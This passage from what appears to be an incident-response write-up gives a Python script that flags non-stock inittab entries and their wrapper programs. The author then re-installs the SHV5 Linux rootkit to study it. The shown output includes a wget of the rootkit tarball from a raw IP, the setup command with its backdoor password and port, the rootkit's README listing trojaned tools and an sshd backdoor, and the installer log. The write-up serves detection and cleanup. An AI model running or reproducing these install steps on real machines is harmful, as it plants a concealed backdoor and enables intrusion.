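2:2345:respawn:/sbin/mingetty tty2
# mo:235:respawn:/usr/sbin/mgetty -s 38400 modem
"""

# Constructed sample: the wrapper script the entry above points at.
TTYLOAD_WRAPPER = """\
/sbin/ttyload -q >/dev/null 2>&1
/sbin/ttymon >/dev/null 2>&1
"""


def parse_inittab(text):
    """Yield (id, runlevels, action, process) for each active (non-comment) entry."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()       # a commented-out entry is not active
        if not line:
            continue
        fields = line.split(":", 3)               # process may itself contain ':'
        if len(fields) != 4:
            continue
        yield tuple(f.strip() for f in fields)


def suspicious_entries(text, known=STOCK_INITTAB_PROGRAMS):
    """Entries whose program is not in the stock set. The comment above an entry is
    ignored on purpose: 'Loading standard ttys' is camouflage, not evidence."""
    out = []
    for ident, runlevels, action, process in parse_inittab(text):
        if not process:
            continue                              # e.g. id:5:initdefault:
        program = process.split()[0]
        if program not in known:
            out.append((ident, runlevels, action, program))
    return out


def wrapper_programs(script_text):
    """Programs started by a one-command-per-line shell wrapper like /usr/sbin/ttyload,
    with flags and redirections dropped; enough to follow the chain one hop further."""
    programs = []
    for raw in script_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line:
            programs.append(line.split()[0])
    return programs


if __name__ == "__main__":
    for ident, runlevels, action, program in suspicious_entries(INITTAB):
        print("inittab %s (runlevels %s, %s) starts %s" % (ident, runlevels, action, program))
        if program == "/usr/sbin/ttyload":       # on a live box: open(program).read()
            print("  which in turn starts:", ", ".join(wrapper_programs(TTYLOAD_WRAPPER)))
```

The "once" action matters for cleanup: init runs the wrapper a single time per runlevel entry, so after removing the line and the binaries nothing respawns them, but until the line is gone every reboot brings the backdoor back regardless of what was killed.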
That, on top of what the tools gave us, is a simple manual analysis of the rootkit: an unmodified SHV5 (the rkhunter hits on /etc/sh.conf and /usr/lib/libsh, the ttyload/ttymon pair and the inittab entry are all its stock layout). These are just some lines of thinking; every intrusion has to be handled on its own terms, and this one was on the easy side.
Now let's test this SHV5 ourselves:
[root@localhost .v]# wget http://211.100.50.70/shv5.tar.gz
Unpack and install:
[root@localhost .v]# tar zxf shv5.tar.gz
[root@localhost .v]# cd shv5
[root@localhost shv5]# ls
bin.tgz  conf.tgz  lib.tgz  README  setup  utilz.tgz
[root@localhost shv5]# cat README
############
### shv5 ###
############
[ASCII-art "shv5" banner omitted]
DISCLAIMER:
* The purpose of these coded instructions, statements and computer
* programs is for TEST AIMS ONLY !
* Their use/misuse is at USERS OWN RISK !
* We do not take any responsibility for any harm or damage caused
* by the use of this file-package.
* This includes copying, duplicating or modifying it in any form !
* USERS WHO USE THIS CODED INSTRUCTIONS, STATEMENTS AND COMPUTER
* PROGRAMS MUST ACCEPT ALL ABOVE STATEMENTS !
* OTHERWISE U ARE OBLIGED TO DELETE THESE FILES IMEDIATELY !
CHANGES [shv5]:
-> - new sshd backdor with env-settings (avoids history logging)
   - The new sshd is in between 1.2.25-2.0.13 SSHD (from ssh.com)
   - not so big and with new great features designed to suite shv5.
-> new rk-dirs coz of lamme anti-shv4 release
-> new security-checks on the script
   - latest flaws included (mod_ssl, samba, sendmail etc..)
-> setup-script rewriten to become more soft (friendly)
-> added new addons (tripwire, snort ... *** er :))
-> added basic utilz on rootkit (i hate dld them on each box)
-> we use md5sum passwords now (more l33t and secure)
USAGE:
-> - If u expect me to tell you how/what/if/when/where type of
   - questions delete these files imediately! This is not for you!
TODO:
-> tcpdump trojan
-> crontab trojan
-> sendmail backdoor
-> ftp backdoor
-> httpd backdoor
-> any other idea ?!?!?! < mail: pint@dosnet.info >
[root@localhost shv5]# ./setup sshdoor 8585
[sh]# Installing shv5 ... this wont take long
[sh]# If u think we will patch your holes shoot yourself !
[sh]# so patch manualy and *** off!
============================================================================
[ASCII-art banner]                    [*] Presenting u shv5-rootkit !
                                      [*] Designed for internal use !
                                      [*] brought to you by: PinT[x]
                                      [*] April ) 2003 )
                                      [*] *** VERY PRIVATE ***
                                      [*] *** so dont distribute ***
============================================================================
[sh]# backdooring started on localhost.localdomain
[sh]#
[sh]#
[sh]# checking for remote logging... guess not.
[sh]# checking for tripwire... guess not.
[sh]# [Installing trojans....]
[sh]# Using Password : sshdoor
[sh]# Using ssh-port : 8585
mkdir: cannot create directory `/usr/lib/libsh': File exists
mkdir: cannot create directory `/usr/lib/libsh/.backup': File exists
[sh]# : ps/ls/top/netstat/ifconfig/find/ and rest backdoored
[sh]#
[sh]# [Installing some utils...]
[sh]# : mirk/synscan/others... moved
[sh]# [Moving our files...]
mkdir: cannot create directory `/usr/lib/libsh/.sniff': File exists
[sh]# : sniff/parse/sauber/hide moved
[sh]# [Modifying system settings to suite our needs]
[sh]# Checking for vuln-daemons ...
Unknown HZ value! (194) Assume 100.
[sh]# RPC.STATD found - patch it bitch !!!!
mkdir: cannot create directory `/usr/lib/libsh/.owned': File exists
--------------------------------------------------------------------
[sh]# [System Information...]
[sh]# Hostname : localhost.localdomain (222.222.66.11)
[sh]# Arch : 2007 -+- bogomips : 6003.55
5999.45 '
[sh]# Alternative IP : 127.0.0.1 -+- Might be [1 ] active adapters.
[sh]# Distribution: Red Hat Enterprise Linux Server release 5 (Tikanga)
--------------------------------------------------------------------
[sh]# ipchains ... ?
[sh]# lucky for u no ipchains found
--------------------------------------------------------------------
[sh]# iptables ...?
iptables: No chain/target/match by that name
--------------------------------------------------------------------
[sh]# Just ignore all errors if any !
[sh]# ============================== Backdooring completed in :3 seconds
[root@localhost shv5]# nc 127.0.0.1 8585
SSH-1.5-2.0.13
Protocol mismatch.
The "File exists" errors are just the first intruder's directories still being on disk; the installer doesn't care. Note that it does not patch anything (the "checking for remote logging" and "checking for tripwire" lines are about not getting caught), and that everything we dug out by hand above, the .backup copies, /etc/sh.conf, the replaced tools with their chattr flags and the inittab entry, is what this one script lays down in three seconds. Working from SHV5's setup script we can turn it into an automatic uninstaller, attached at the end of the post.
Exhausted. Heading home to rest.